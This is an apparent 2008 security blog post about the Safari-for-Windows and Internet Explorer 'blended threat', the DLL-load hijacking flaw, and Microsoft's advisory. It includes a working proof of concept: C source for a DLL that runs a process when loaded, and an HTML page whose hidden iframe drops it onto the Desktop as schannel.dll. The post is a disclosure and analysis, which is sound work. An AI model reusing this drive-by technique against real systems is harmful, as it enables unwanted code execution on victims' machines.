*Safari for Windows "Blended Threat" Credit*

The "Blended Threat" credit surely goes to Aviv Raff.

He didn't publish the technical details.

But if you are familiar with his past findings ...
00000001

Pagetop

IE Patch Going to Fix The Security Issue Involving Safari This Tuesday?

Well, got to admit, the title is weird - Microsoft fix Safari issue with IE patch.

But these are the words in news "Patch Tuesday this month ... The Internet Explorer bulletin is expected to be cumulative and might include some remediation for the Safari for Windows vulnerability disclosed last month by Nitesh Dhanjani". It's claimed that IE patch intends to help remediation for Safari vulnerability. This goes against all common sense. When did Microsoft become a charity?

In the advisory Microsoft say "may include releasing a security update through the security update release process", also they acknowledge "Aviv Raff for working with us and reporting the blended threat of Safari and Microsoft Internet Explorer". In the Aviv Raff side, he is also indicating "I've reported this issue to Microsoft over a week ago", and "I've decided to work with Microsoft on this issue". The advisory was published on May 30, 2008.

(So, the discovery by Aviv Raff is the issue here, intead of the discovery by Nitesh Dhanjani. The former involves both IE and Safari, and the latter only involves Safari. More details here.)
Pagetop

A New Security Issue in Safari for Windows, NOT the "Blended Threat" Described in Microsoft Security Advisory 953818

Safari for Windows can download a fake icon(Shorcut dot LNK file) to Desktop. Then user might launch it because the icon can look legitimate. This results in command execution, which is as dangerous as remote code execution.

A mitigating factor is Safari's "Downloads" window will pop up and it shows the downloaded icon(Shorcut dot LNK file) - both its name and its look and the arrow(symbol of Shorcut dot LNK file). So user is well informed regarding it as Safari downloads it.

Please note this issue is NOT the "blended threat" described in Microsoft Security Advisory 953818 which Aviv Raff is working on with Microsoft.
Pagetop

Should Apple's Safari for Windows be Blamed for "Blended Threat" Described in Microsoft Security Advisory 953818?

Microsoft used some vague wording in the advisory: "Suggested Actions" are "Restrict use of Safari as a web browser ...".

It sounds as if it's a flaw rooted in Safari. But, what exactly is the role Safari playing in this "blended threat"? Answer is, Safari for Windows puts downloads to Desktop by default without a dialog box(such as the "File Download" dialog box in IE). Well, this is in fact a quite reasonable and convenient feature - downloading and saving requested file to user's Desktop by default. This feature itself does not constitute a mistake. What really makes the "blended threat" is some problem in loading program library files(DLL) by Windows Internet Explorer(and probably others), technical details is here.
Pagetop

Design Flaw in Windows Internet Explorer Allows Remote Code Execution From Safari for Windows

Summary of What Happened
Nitesh Dhanjani discovered that Safari for Windows puts downloads automatically to Desktop and argued this can potentially make a mess of Desktop, naming it the effect of "Safari Carpet Bomb". Later Microsoft issued an advisory stating "remote code execution on all supported versions of Windows XP and Windows Vista" and "Aviv Raff for working with us and reporting the blended threat of Safari and Microsoft Internet Explorer". Aviv Raff posted on his blog "Safari pwns Internet Explorer", clarifying "this combined attack also exploits an old vulnerability in Internet Explorer that I've already reported to them a long long time ago".

Technical Details of This Incident
The old vulnerability that Aviv Raff reported to Microsoft long time ago is described in two articles by Aviv Raff: IE7 DLL-load hijacking Code Execution Exploit PoC, and Internet Explorer 7 - Still Spyware Writers Heaven, both dating back to 2006(yeah that's really "a long long time ago"). This vulnerability lies in Windows Internet Explorer loading program library files(DLL) from user's Desktop instead of its own library file folder(usually C:\WINDOWS\SYSTEM32), when filenames are set to some specific values.

Safari for Windows downloads files to Desktop by default with no confirmation - which is a quite reasonable and convenient feature. And Windows Internet Explorer loads program library(DLL) from Desktop if the filename is set to some specific value. Two things added up, or "blended", IE loads library file downloaded by Safari. The action of loading library runs code in the library file, and loading the wrong file results in executing the wrong code.

Proof of Concept Code
----------dll.c----------
#include <windows.h>

BOOL APIENTRY DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved
)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;

ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi,sizeof(pi));

CreateProcess(NULL,"NOTEPAD \"=====(((((we are in)))))=====\"",NULL,NULL,FALSE,0,NULL,NULL,&si,&pi);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return TRUE;
}



Compile by cl /LD dll.c and rename the generated DLL file to "schannel.dll"

----------index.html----------
<html><head>
<title>Safari for Windows Proof of Concept (Incident in June 2008)</title>
</head><body>
Safari for Windows Proof of Concept (Incident in June 2008)<br>
<br>
<a href="http://liudieyu0.blog124.fc2.com/blog-entry-1.html">Detailed Analysis Available on My Blog ...</a><br>
<br>
Step 1. Browse this web page with Safari for Windows, and download is copied to Desktop.
It's a legitimate feature.<br>
<iframe src="schannel.dll" width=1 height=1></iframe><br>
Step 2. Now launch Internet Explorer from Desktop or Start Menu, and code from the DLL file is executed.
<i>This is the issue.</i><br>
<br>
Note:<br>
Code in the DLL file launches NOTEPAD to open a file that doesn't exist.<br>
Please remove the downloaded DLL file on Desktop after testing.<br>
</body></html>

Live Demo
http://liudieyu.com/iesafari200806.2885391780966027/

Final Words on This
A design flaw in Windows Internet Explorer, version 8 beta, 7, and probably others, breaks the security of Safari for Windows shipped by Apple. The problem originated from an error that Windows Internet Explorer will load some program library files(DLL) from user's Desktop instead of its own library file folder(usually C:\WINDOWS\SYSTEM32). Apple's Safari for Windows downloads and saves requested file to user's Desktop by default - this default behavior itself does not constitute a mistake. Microsoft used some vague wording in the advisory: "Suggested Actions" are "Restrict use of Safari as a web browser ...", as if it's a flaw rooted in Safari.

In sub-folder of "Suggested Actions" Microsoft admits "Workarounds" as "Change the download location of content in Safari to a newly created directory". The full statement should be "Change the download location of content in Safari to a newly created directory(to save the integrity of Windows Internet Explorer)".

PS:
I'm not an Apple fan, in fact I applied for their position of Safari for Windows Tester and they never replied. It's not so lame, cause they don't even get back to reporters when the whole world is accusing their product - "An Apple spokesman did not return a phone call and e-mail seeking comment".

I believe in time all things come to light.
Pagetop
home
Pagetop
Profile

Author:LIUDIEYU
Welcome to FC2

New Entry
New Comment
New Trackback
Monthly Archive
Category
Search


RSS Feed
Links
Add this blog to links